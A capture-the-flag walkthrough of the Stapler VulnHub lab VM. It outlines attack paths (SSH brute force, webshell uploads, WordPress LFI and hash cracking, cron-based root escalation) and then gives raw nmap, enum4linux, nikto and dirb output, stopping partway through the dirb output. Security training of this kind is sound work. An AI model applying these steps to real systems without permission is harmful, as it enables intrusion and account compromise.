VulnHub Stapler (Beginner-Medium)

===================================================================================
Walkthrough of the Stapler VulnHub VM CTF
===================================================================================

Step 1. Scanning & Enumeration (Nmap + Nikto + Dirb + Enum4Linux + WPscan)

Step 2. Gaining access
	
	Method 1
	--------
	> Anonymous user enumeration (SMB 139) + Brute-force on SSH with Login=pwd
	
	Method 2
	--------
	> Anonymous upload of a Webshell on a TFTP server + Execution of the Webshell through the Web server listening on port 80
	
	Method 3
	--------
	3.1 Identification and exploitation of a LFI vulnerability in a WordPress plug-in
	3.2. Then download of the 'WP-config.php' containing the Database credentials 
	3.3. Use DB credentials to login to Mysql or PHPMyadmin 
	3.4. Upload a Webshell via Mysql
	OR
	3.4  Upload a Webshell via PHPMyadmin
	OR
	3.4  a. Dump the Wordpress users table (WP-USER) containing credentials (hashes)
	     b. Crack the WordPress password hashes and found the Admin credentials (eliot)
	     c. Login to the WordPress as an admin (eliot) and upload a Webshell via the upload plug-in function

Step 3. Post-exploitation - Linux enumeration (LinEnum.sh + Linux-exploit-suggester.sh + Searchsploit)

Step 4. Privilege escalation to root

	Method 1
	--------
	> World writeable ".bash_history" file containing credentials + SUDO (ALL:ALL)

	Method 2
	--------
	> World writeable script "cron-logrotate.sh" which is run every 5 minutes by a cron job named "logrotate" and owned by root


==========================================================================================================
Step 1. Scanning & Enumeration (Nmap + Nikto + Dirb + Enum4Linux + WPscan)
==========================================================================================================

root@Security-Audit-01:~# nmap -sS -sV -sC -vv -p- 192.168.1.28

# Nmap 7.70 scan initiated Sun Jul 22 17:44:22 2018 as: nmap -sS -sV -sC -vv -p- 192.168.1.28
Nmap scan report for 192.168.1.28
Host is up, received arp-response (0.00045s latency).
Scanned at 2018-07-22 17:44:22 CEST for 147s
Not shown: 65523 filtered ports
Reason: 65523 no-responses
PORT      STATE  SERVICE     REASON         VERSION
20/tcp    closed ftp-data    reset ttl 64
21/tcp    open   ftp         syn-ack ttl 64 vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: PASV failed: 550 Permission denied.
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 192.168.1.9
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 1
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp    open   ssh         syn-ack ttl 64 OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 81:21:ce:a1:1a:05:b1:69:4f:4d:ed:80:28:e8:99:05 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDc/xrBbi5hixT2B19dQilbbrCaRllRyNhtJcOzE8x0BM1ow9I80RcU7DtajyqiXXEwHRavQdO+/cHZMyOiMFZG59OCuIouLRNoVO58C91gzDgDZ1fKH6BDg+FaSz+iYZbHg2lzaMPbRje6oqNamPR4QGISNUpxZeAsQTLIiPcRlb5agwurovTd3p0SXe0GknFhZwHHvAZWa2J6lHE2b9K5IsSsDzX2WHQ4vPb+1DzDHV0RTRVUGviFvUX1X5tVFvVZy0TTFc0minD75CYClxLrgc+wFLPcAmE2C030ER/Z+9umbhuhCnLkLN87hlzDSRDPwUjWr+sNA3+7vc/xuZul
|   256 5b:a5:bb:67:91:1a:51:c2:d3:21:da:c0:ca:f0:db:9e (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNQB5n5kAZPIyHb9lVx1aU0fyOXMPUblpmB8DRjnP8tVIafLIWh54wmTFVd3nCMr1n5IRWiFeX1weTBDSjjz0IY=
|   256 6d:01:b7:73:ac:b0:93:6f:fa:b9:89:e6:ae:3c:ab:d3 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJ9wvrF4tkFMApswOmWKpTymFjkaiIoie4QD0RWOYnny
53/tcp    open   domain      syn-ack ttl 64 dnsmasq 2.75
| dns-nsid: 
|_  bind.version: dnsmasq-2.75
80/tcp    open   http        syn-ack ttl 64 PHP cli server 5.5 or later
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: 404 Not Found
123/tcp   closed ntp         reset ttl 64
137/tcp   closed netbios-ns  reset ttl 64
138/tcp   closed netbios-dgm reset ttl 64
139/tcp   open   netbios-ssn syn-ack ttl 64 Samba smbd 4.3.9-Ubuntu (workgroup: WORKGROUP)
666/tcp   open   doom?       syn-ack ttl 64
| fingerprint-strings: 
|   NULL: 
|     message2.jpgUT 
|     QWux
|     "DL[E
|     #;3[
|     \xf6
|     u([r
|     qYQq
|     Y_?n2
|     3&M~{
|     9-a)T
|     L}AJ
|_    .npy.9
3306/tcp  open   mysql       syn-ack ttl 64 MySQL 5.7.12-0ubuntu1
| mysql-info: 
|   Protocol: 10
|   Version: 5.7.12-0ubuntu1
|   Thread ID: 67
|   Capabilities flags: 63487
|   Some Capabilities: LongColumnFlag, LongPassword, SupportsLoadDataLocal, Speaks41ProtocolNew, Speaks41ProtocolOld, SupportsTransactions, InteractiveClient, ODBCClient, FoundRows, Support41Auth, IgnoreSpaceBeforeParenthesis, IgnoreSigpipes, DontAllowDatabaseTableColumn, SupportsCompression, ConnectWithDatabase, SupportsMultipleStatments, SupportsAuthPlugins, SupportsMultipleResults
|   Status: Autocommit
|   Salt: \x1FpsYbnx\x0D6E"
| G+9l\x0Bm-\x0D
|_  Auth Plugin Name: 88
12380/tcp open   http        syn-ack ttl 64 Apache httpd 2.4.18 ((Ubuntu))
| http-methods: 
|_  Supported Methods: OPTIONS GET HEAD POST
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Tim, we need to-do better next year for Initech
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port666-TCP:V=7.70%I=7%D=7/22%Time=5B54A6C0%P=x86_64-pc-linux-gnu%r(NUL
SF:L,1350,"PK\x03\x04\x14\0\x02\0\x08\0d\x80\xc3Hp\xdf\x15\x81\xaa,\0\0\x1
SF:52\0\0\x0c\0\x1c\0message2\.jpgUT\t\0\x03\+\x9cQWJ\x9cQWux\x0b\0\x01\x0
SF:4\xf5\x01\0\0\x04\x14\0\0\0\xadz\x0bT\x13\xe7\xbe\xefP\x94\x88\x88A@\xa
SF:2\x20\x19\xabUT\xc4T\x11\xa9\x102>\x8a\xd4RDK\x15\x85Jj\xa9\"DL\[E\xa2\
SF:x0c\x19\x140<\xc4\xb4\xb5\xca\xaen\x89\x8a\x8aV\x11\x91W\xc5H\x20\x0f\x
SF:b2\xf7\xb6\x88\n\x82@%\x99d\xb7\xc8#;3\[\r_\xcddr\x87\xbd\xcf9\xf7\xaeu
SF:\xeeY\xeb\xdc\xb3oX\xacY\xf92\xf3e\xfe\xdf\xff\xff\xff=2\x9f\xf3\x99\xd
SF:3\x08y}\xb8a\xe3\x06\xc8\xc5\x05\x82>`\xfe\x20\xa7\x05:\xb4y\xaf\xf8\xa
SF:0\xf8\xc0\^\xf1\x97sC\x97\xbd\x0b\xbd\xb7nc\xdc\xa4I\xd0\xc4\+j\xce\[\x
SF:87\xa0\xe5\x1b\xf7\xcc=,\xce\x9a\xbb\xeb\xeb\xdds\xbf\xde\xbd\xeb\x8b\x
SF:f4\xfdis\x0f\xeeM\?\xb0\xf4\x1f\xa3\xcceY\xfb\xbe\x98\x9b\xb6\xfb\xe0\x
SF:dc\]sS\xc5bQ\xfa\xee\xb7\xe7\xbc\x05AoA\x93\xfe9\xd3\x82\x7f\xcc\xe4\xd
SF:5\x1dx\xa2O\x0e\xdd\x994\x9c\xe7\xfe\x871\xb0N\xea\x1c\x80\xd63w\xf1\xa
SF:f\xbd&&q\xf9\x97'i\x85fL\x81\xe2\\\xf6\xb9\xba\xcc\x80\xde\x9a\xe1\xe2:
SF:\xc3\xc5\xa9\x85`\x08r\x99\xfc\xcf\x13\xa0\x7f{\xb9\xbc\xe5:i\xb2\x1bk\
SF:x8a\xfbT\x0f\xe6\x84\x06/\xe8-\x17W\xd7\xb7&\xb9N\x9e<\xb1\\\.\xb9\xcc\
SF:xe7\xd0\xa4\x19\x93\xbd\xdf\^\xbe\xd6\xcdg\xcb\.\xd6\xbc\xaf\|W\x1c\xfd
SF:\xf6\xe2\x94\xf9\xebj\xdbf~\xfc\x98x'\xf4\xf3\xaf\x8f\xb9O\xf5\xe3\xcc\
SF:x9a\xed\xbf`a\xd0\xa2\xc5KV\x86\xad\n\x7fou\xc4\xfa\xf7\xa37\xc4\|\xb0\
SF:xf1\xc3\x84O\xb6nK\xdc\xbe#\)\xf5\x8b\xdd{\xd2\xf6\xa6g\x1c8\x98u\(\[r\
SF:xf8H~A\xe1qYQq\xc9w\xa7\xbe\?}\xa6\xfc\x0f\?\x9c\xbdTy\xf9\xca\xd5\xaak
SF:\xd7\x7f\xbcSW\xdf\xd0\xd8\xf4\xd3\xddf\xb5F\xabk\xd7\xff\xe9\xcf\x7fy\
SF:xd2\xd5\xfd\xb4\xa7\xf7Y_\?n2\xff\xf5\xd7\xdf\x86\^\x0c\x8f\x90\x7f\x7f
SF:\xf9\xea\xb5m\x1c\xfc\xfef\"\.\x17\xc8\xf5\?B\xff\xbf\xc6\xc5,\x82\xcb\
SF:[\x93&\xb9NbM\xc4\xe5\xf2V\xf6\xc4\t3&M~{\xb9\x9b\xf7\xda-\xac\]_\xf9\x
SF:cc\[qt\x8a\xef\xbao/\xd6\xb6\xb9\xcf\x0f\xfd\x98\x98\xf9\xf9\xd7\x8f\xa
SF:7\xfa\xbd\xb3\x12_@N\x84\xf6\x8f\xc8\xfe{\x81\x1d\xfb\x1fE\xf6\x1f\x81\
SF:xfd\xef\xb8\xfa\xa1i\xae\.L\xf2\\g@\x08D\xbb\xbfp\xb5\xd4\xf4Ym\x0bI\x9
SF:6\x1e\xcb\x879-a\)T\x02\xc8\$\x14k\x08\xae\xfcZ\x90\xe6E\xcb<C\xcap\x8f
SF:\xd0\x8f\x9fu\x01\x8dvT\xf0'\x9b\xe4ST%\x9f5\x95\xab\rSWb\xecN\xfb&\xf4
SF:\xed\xe3v\x13O\xb73A#\xf0,\xd5\xc2\^\xe8\xfc\xc0\xa7\xaf\xab4\xcfC\xcd\
SF:x88\x8e}\xac\x15\xf6~\xc4R\x8e`wT\x96\xa8KT\x1cam\xdb\x99f\xfb\n\xbc\xb
SF:cL}AJ\xe5H\x912\x88\(O\0k\xc9\xa9\x1a\x93\xb8\x84\x8fdN\xbf\x17\xf5\xf0
SF:\.npy\.9\x04\xcf\x14\x1d\x89Rr9\xe4\xd2\xae\x91#\xfbOg\xed\xf6\x15\x04\
SF:xf6~\xf1\]V\xdcBGu\xeb\xaa=\x8e\xef\xa4HU\x1e\x8f\x9f\x9bI\xf4\xb6GTQ\x
SF:f3\xe9\xe5\x8e\x0b\x14L\xb2\xda\x92\x12\xf3\x95\xa2\x1c\xb3\x13\*P\x11\
SF:?\xfb\xf3\xda\xcaDfv\x89`\xa9\xe4k\xc4S\x0e\xd6P0");
MAC Address: 08:00:27:72:14:43 (Oracle VirtualBox virtual NIC)
Service Info: Host: RED; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 1h39m58s, deviation: 34m38s, median: 1h59m57s
| nbstat: NetBIOS name: RED, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
|   RED<00>              Flags: <unique><active>
|   RED<03>              Flags: <unique><active>
|   RED<20>              Flags: <unique><active>
|   WORKGROUP<00>        Flags: <group><active>
|   WORKGROUP<1e>        Flags: <group><active>
| Statistics:
|   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|_  00 00 00 00 00 00 00 00 00 00 00 00 00 00
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 32672/tcp): CLEAN (Timeout)
|   Check 2 (port 55127/tcp): CLEAN (Timeout)
|   Check 3 (port 42140/udp): CLEAN (Failed to receive data)
|   Check 4 (port 49404/udp): CLEAN (Failed to receive data)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.9-Ubuntu)
|   Computer name: red
|   NetBIOS computer name: RED\x00
|   Domain name: \x00
|   FQDN: red
|_  System time: 2018-07-22T18:46:18+01:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2018-07-22 19:46:20
|_  start_date: N/A

Failed to resolve "nmap-report".
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jul 22 17:46:49 2018 -- 1 IP address (1 host up) scanned in 147.31 seconds

=============================================================================================================

root@Security-Audit-01:~# nmap -Pn -sU 192.168.1.28

# Nmap 7.70 scan initiated Sun Jul 22 18:04:10 2018
Nmap scan report for 192.168.1.28
Host is up (0.00055s latency).
Not shown: 995 closed ports
PORT    STATE         SERVICE
53/udp  open          domain
68/udp  open|filtered dhcpc
69/udp  open|filtered tftp
137/udp open          netbios-ns
138/udp open|filtered netbios-dgm
MAC Address: 08:00:27:72:14:43 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 1100.98 seconds

=============================================================================================================

root@kali:~# enum4linux -a 192.168.1.30
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Mon May 15 14:52:47 2017

==========================
|    Target Information    |
 ==========================
Target ........... 192.168.1.30
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

====================================================
|    Enumerating Workgroup/Domain on 192.168.1.30    |
 ====================================================
[+] Got domain/workgroup name: WORKGROUP

============================================
|    Nbtstat Information for 192.168.1.30    |
 ============================================
Looking up status of 192.168.1.30
 RED             <00> -         H <ACTIVE>  Workstation Service
 RED             <03> -         H <ACTIVE>  Messenger Service
 RED             <20> -         H <ACTIVE>  File Server Service
 ..__MSBROWSE__. <01> - <GROUP> H <ACTIVE>  Master Browser
 WORKGROUP       <00> - <GROUP> H <ACTIVE>  Domain/Workgroup Name
 WORKGROUP       <1d> -         H <ACTIVE>  Master Browser
 WORKGROUP       <1e> - <GROUP> H <ACTIVE>  Browser Service Elections

MAC Address = 00-00-00-00-00-00

=====================================
|    Session Check on 192.168.1.30    |
 =====================================
[+] Server 192.168.1.30 allows sessions using username '', password ''

===========================================
|    Getting domain SID for 192.168.1.30    |
 ===========================================
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup

======================================
|    OS information on 192.168.1.30    |
 ======================================
[+] Got OS info for 192.168.1.30 from smbclient: Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.9-Ubuntu]
[+] Got OS info for 192.168.1.30 from srvinfo:
 RED            Wk Sv PrQ Unx NT SNT red server (Samba, Ubuntu)
 platform_id     : 500
 os version      : 6.1
 server type     : 0x809a03

=============================
|    Users on 192.168.1.30    |
 =============================
Use of uninitialized value $users in print at ./enum4linux.pl line 874.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 877.

Use of uninitialized value $users in print at ./enum4linux.pl line 888.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 890.

=========================================
|    Share Enumeration on 192.168.1.30    |
 =========================================
WARNING: The "syslog" option is deprecated
Connection to 192.168.1.30 failed (Error NT_STATUS_IO_TIMEOUT)

[+] Attempting to map shares on 192.168.1.30

====================================================
|    Password Policy Information for 192.168.1.30    |
 ====================================================

[+] Attaching to 192.168.1.30 using a NULL share

[+] Trying protocol 445/SMB...

[!] Protocol failed: [Errno 110] Connection timed out (192.168.1.30:445)

[+] Trying protocol 139/SMB...

[+] Found domain(s):

[+] RED
 [+] Builtin

[+] Password Info for Domain: RED

[+] Minimum password length: 5
 [+] Password history length: None
 [+] Maximum password age: Not Set
 [+] Password Complexity Flags: 000000

[+] Domain Refuse Password Change: 0
  [+] Domain Password Store Cleartext: 0
  [+] Domain Password Lockout Admins: 0
  [+] Domain Password No Clear Change: 0
  [+] Domain Password No Anon Change: 0
  [+] Domain Password Complex: 0

[+] Minimum password age: None
 [+] Reset Account Lockout Counter: 30 minutes
 [+] Locked Account Duration: 30 minutes
 [+] Account Lockout Threshold: None
 [+] Forced Log off Time: Not Set

[+] Retieved partial password policy with rpcclient:

Password Complexity: Disabled
Minimum Password Length: 5

==============================
|    Groups on 192.168.1.30    |
 ==============================

[+] Getting builtin groups:

[+] Getting builtin group memberships:

[+] Getting local groups:

[+] Getting local group memberships:

[+] Getting domain groups:

[+] Getting domain group memberships:

=======================================================================
|    Users on 192.168.1.30 via RID cycling (RIDS: 500-550,1000-1050)    |
 =======================================================================
[I] Found new SID: S-1-22-1
[I] Found new SID: S-1-5-21-864226560-67800430-3082388513
[I] Found new SID: S-1-5-32
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 = peter
S-1-22-1-1001 = RNunemaker
S-1-22-1-1002 = ETollefson
S-1-22-1-1003 = DSwanger
S-1-22-1-1004 = AParnell
S-1-22-1-1005 = SHayslett
S-1-22-1-1006 = MBassin
S-1-22-1-1007 = JBare
S-1-22-1-1008 = LSolum
S-1-22-1-1009 = IChadwick
S-1-22-1-1010 = MFrei
S-1-22-1-1011 = SStroud
S-1-22-1-1012 = CCeaser
S-1-22-1-1013 = JKanode
S-1-22-1-1014 = CJoo
S-1-22-1-1015 = Eeth
S-1-22-1-1016 = LSolum2
S-1-22-1-1017 = JLipps
S-1-22-1-1018 = jamie
S-1-22-1-1020 = Drew
S-1-22-1-1022 = SHAY
S-1-22-1-1023 = Taylor
S-1-22-1-1024 = mel
S-1-22-1-1025 = kai
S-1-22-1-1027 = NATHAN
S-1-22-1-1028 = www
S-1-22-1-1029 = elly
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
S-1-5-32-500 *unknown*\*unknown* (8)
S-1-5-32-501 *unknown*\*unknown* (8)
S-1-5-32-502 *unknown*\*unknown* (8)
S-1-5-32-503 *unknown*\*unknown* (8)
<snip>
S-1-5-32-523 *unknown*\*unknown* (8)
S-1-5-32-524 *unknown*\*unknown* (8)
S-1-5-32-525 *unknown*\*unknown* (8)
S-1-5-32-526 *unknown*\*unknown* (8)
<snip>
S-1-5-32-542 *unknown*\*unknown* (8)
S-1-5-32-543 *unknown*\*unknown* (8)
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
S-1-5-32-1000 *unknown*\*unknown* (8)
S-1-5-32-1002 *unknown*\*unknown* (8)
S-1-5-32-1003 *unknown*\*unknown* (8)
S-1-5-32-1004 *unknown*\*unknown* (8)
<snip>
^C
root@kali:~#

=============================================================================================================

root@Security-Audit-01:~/Desktop/Stapler# nikto -h http://192.168.1.28/
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.1.28
+ Target Hostname:    192.168.1.28
+ Target Port:        80
+ Start Time:         2018-07-22 18:12:40 (GMT2)
---------------------------------------------------------------------------
+ Server: No banner retrieved
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OSVDB-3093: /.bashrc: User home dir was found with a shell rc file. This may reveal file and path information.
+ OSVDB-3093: /.profile: User home dir with a shell profile was found. May reveal directory information and system configuration.
+ ERROR: Error limit (20) reached for host, giving up. Last error: error reading HTTP response
+ Scan terminated:  20 error(s) and 5 item(s) reported on remote host
+ End Time:           2018-07-22 18:12:55 (GMT2) (15 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

=============================================================================================================
root@Security-Audit-01:~/Desktop/Stapler# nikto -h https://192.168.1.28:12380/
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.1.28
+ Target Hostname:    192.168.1.28
+ Target Port:        12380
---------------------------------------------------------------------------
+ SSL Info:        Subject:  /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are you meant to put here?/O=Initech/OU=Pam: I give up. no idea what to put here./CN=Red.Initech/emailAddress=pam@red.localhost
                   Ciphers:  ECDHE-RSA-AES256-GCM-SHA384
                   Issuer:   /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are you meant to put here?/O=Initech/OU=Pam: I give up. no idea what to put here./CN=Red.Initech/emailAddress=pam@red.localhost
+ Start Time:         2018-07-22 18:00:00 (GMT2)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'dave' found, with contents: Soemthing doesn't look right here
+ The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Hostname '192.168.1.28' does not match certificate's names: Red.Initech
+ Server leaks inodes via ETags, header found with file /blogblog/, fields: 0x6a16a 0x53462974b46e8 
+ The Content-Encoding header is set to "deflate" this may mean that the server is vulnerable to the BREACH attack.
+ Allowed HTTP Methods: OPTIONS, GET, HEAD, POST 
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ Cookie wordpress_test_cookie created without the httponly flag
<SNIP>

=============================================================================================================
root@Security-Audit-01:~/Desktop/Stapler# nikto -h https://192.168.1.28:12380/blogblog/
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.1.28
+ Target Hostname:    192.168.1.28
+ Target Port:        12380
---------------------------------------------------------------------------
+ SSL Info:        Subject:  /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are you meant to put here?/O=Initech/OU=Pam: I give up. no idea what to put here./CN=Red.Initech/emailAddress=pam@red.localhost
                   Ciphers:  ECDHE-RSA-AES256-GCM-SHA384
                   Issuer:   /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are you meant to put here?/O=Initech/OU=Pam: I give up. no idea what to put here./CN=Red.Initech/emailAddress=pam@red.localhost
+ Start Time:         2018-07-22 18:04:20 (GMT2)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'dave' found, with contents: Soemthing doesn't look right here
+ The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Hostname '192.168.1.28' does not match certificate's names: Red.Initech
+ Server leaks inodes via ETags, header found with file /blogblog/, fields: 0x6a16a 0x53462974b46e8 
+ The Content-Encoding header is set to "deflate" this may mean that the server is vulnerable to the BREACH attack.
+ Allowed HTTP Methods: OPTIONS, GET, HEAD, POST 
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ /blogblog/readme.html: This WordPress file reveals the installed version.
+ /blogblog/wp-links-opml.php: This WordPress script reveals the installed version.
+ OSVDB-3092: /blogblog/license.txt: License file found may identify site software.
+ Cookie wordpress_test_cookie created without the httponly flag
+ /blogblog/wp-login.php?action=register: Wordpress registration enabled
+ OSVDB-3268: /blogblog/wp-content/uploads/: Directory indexing found.
+ /blogblog/wp-content/uploads/: Wordpress uploads directory is browsable. This may reveal sensitive information
+ /blogblog/wp-login.php: Wordpress login found
+ 7535 requests: 0 error(s) and 18 item(s) reported on remote host
+ End Time:           2018-07-22 18:06:12 (GMT2) (112 seconds)
---------------------------------------------------------------

=============================================================================================================

root@Security-Audit-01:~/Desktop/Stapler# dirb https://192.168.1.28:12380/ /usr/share/dirb/wordlists/big.txt

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sun Jul 22 18:14:28 2018
URL_BASE: https://192.168.1.28:12380/
WORDLIST_FILES: /usr/share/dirb/wordlists/big.txt

-----------------

GENERATED WORDS: 20458                                                         

---- Scanning URL: https://192.168.1.28:12380/ ----
==> DIRECTORY: https://192.168.1.28:12380/announcements/                                                       
==> DIRECTORY: https://192.168.1.28:12380/javascript/                                                          
==> DIRECTORY: https://192.168.1.28:12380/phpmyadmin/                                                          
+ https://192.168.1.28:12380/robots.txt (CODE:200|SIZE:59)                                                     
+ https://192.168.1.28:12380/server-status (CODE:403|SIZE:303)                                                 
                                                                                                               
---- Entering directory: https://192.168.1.28:12380/announcements/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                               
---- Entering directory: https://192.168.1.28:12380/javascript/ ----
==> DIRECTORY: https://192.168.1.28:12380/javascript/jquery/                                                   
                                                                                                               
---- Entering directory: https://192.168.1.28:12380/phpmyadmin/ ----
==> DIRECTORY: https://192.168.1.28:12380/phpmyadmin/doc/                                                      
+ https://192.168.1.28:12380/phpmyadmin/favicon.ico (CODE:200|SIZE:22486)                                      
==> DIRECTORY: https://192.168.1.28:12380/phpmyadmin/js/                                                       
+ https://192.168.1.28:12380/phpmyadmin/libraries (CODE:403|SIZE:310)                                          
==> DIRECTORY: https://192.168.1.28:12380/phpmyadmin/locale/                                                   
+ https://192.168.1.28:12380/phpmyadmin/setup (CODE:401|SIZE:462)                                              
==> DIRECTORY: https://192.168.1.28:12380/phpmyadmin/sql/                                                      
==> DIRECTORY: https://192.168.1.28:12380/phpmyadmin/templates/                                                
==> DIRECTORY: https://192.168.1.28:12380/phpmyadmin/themes/                                                   
                                                                                                               
---- Entering directory: https://192.168.1.28:12380/javascript/jquery/ ----
+ https://192.168.1.28:12380/javascript/jquery/jquery (CODE:200|SIZE:284394)                                   
                                                                                                               
---- Entering directory: https://192.168.1.28:12380/phpmyadmin/doc/ ----
==> DIRECTORY: https://192.168.1.28:12380/phpmyadmin/doc/html/                                                 
                                                                                                               
---- Entering directory: https://192.168.1.28:12380/phpmyadmin/js/ ----
==> DIRECTORY: https://192.168.1.28:12380/phpmyadmin/js/jquery/                                                
==> DIRECTORY: https://192.168.1.28:12380/phpmyadmin/js/pmd/                                                   
==> DIRECTORY: https://192.168.1.28:12380/phpmyadmin/js/transformations/                                       
                                                                                                               
---- Entering directory: https://192.168.1.28:12380/phpmyadmin/locale/ ----
==> DIRECTORY: https://192.168.1.28:12380/phpmyadmin/locale/az/                                                
==> DIRECTORY: https://192.168.1.28:12380/phpmyadmin/locale/bg/                                                
==> DIRECTORY: https://192.168.1.28:12380/phpmyadmin/locale/bn/                                                
==> DIRECTORY: https://192.168.1.28:12380/phpmyadmin/locale/ca/                                                
==> DIRECTORY: https://192.168.1.28:12380/phpmyadmin/locale/cs/                                                
==> DIRECTORY: https://192.168.1.28:12380/phpmyadmin/locale/da/                                                
==> DIRECTORY: https://192.168.1.28:12380/phpmyadmin/locale/de/                                                
==> DIRECTORY: https://192.168.1.28:12380/phpmyadmin/locale/el/                                                
==> DIRECTORY: https://192.168.1.28:12380/phpmyadmin/locale/es/                                                
==> DIRECTORY: https://192.168.1.28:12380/phpmyadmin/locale/et/                                                
==> DIRECTORY: https://192.168.1.28:12380/phpmyadmin/locale/fi/                                                
==> DIRECTORY: https://192.168.1.28:12380/phpmyadmin/locale/fr/                                                
==> DIRECTORY: https://192.168.1.28:12380/phpmyadmin/locale/gl/                                                
==> DIRECTORY: https://192.168.1.28:12380/phpmyadmin/locale/hu/                                                
==> DIRECTORY: https://192.168.1.28:12380/phpmyadmin/locale/hy/                                                
==> DIRECTORY: https://192.168.1.28:12380/phpmyadmin/locale/ia/                                                
==> DIRECTORY: https://192.168.1.28:12380/phpmyadmin/locale/id/                                                
==> DIRECTORY: https://192.168.1.28:12380/phpmyadmin/locale/it/                                                
==> DIRECTORY: https://192.168.1.28:12380/phpmyadmin/locale/ja/                                                
==> DIRECTORY: https://192.168.1.28:12380/phpmyadmin/locale/ko/                                                
==> DIRECTORY: https://192.168.1.28:12380/phpmyadmin/locale/lt/                                                
==> DIRECTORY: https://192.168.1.28:12380/phpmyadmin/locale/nb/                                                
==> DIRECTORY: https://192.168.1.28:12380/phpmyadmin/locale/nl/                                                
==> DIRECTORY: https://192.168.1.28:12380/phpmyadmin/locale/pl/                                                
==> DIRECTORY: https://192.168.1.28:12380/phpmyadmin/locale/pt/                                                
==> DIRECTORY: https://192.168.1.28:12380/phpmyadmin/locale/pt_BR/                                             
==> DIRECTORY: https://192.168.1.28:12380/phpmyadmin/locale/ro/                                                
==> DIRECTORY: https://192.168.1.28:12380/phpmyadmin/locale/ru/                                                
==> DIRECTORY: https://192.168.1.28:12380/phpmyadmin/locale/si/                                                
==> DIRECTORY: https://192.168.1.28:12380/phpmyadmin/locale/sk/                                                
==> DIRECTORY: https://192.168.1.28:12380/phpmyadmin/locale/sl/                                                
==> DIRECTORY: https://192.168.1.28:12380/phpmyadmin/locale/sq/                                                
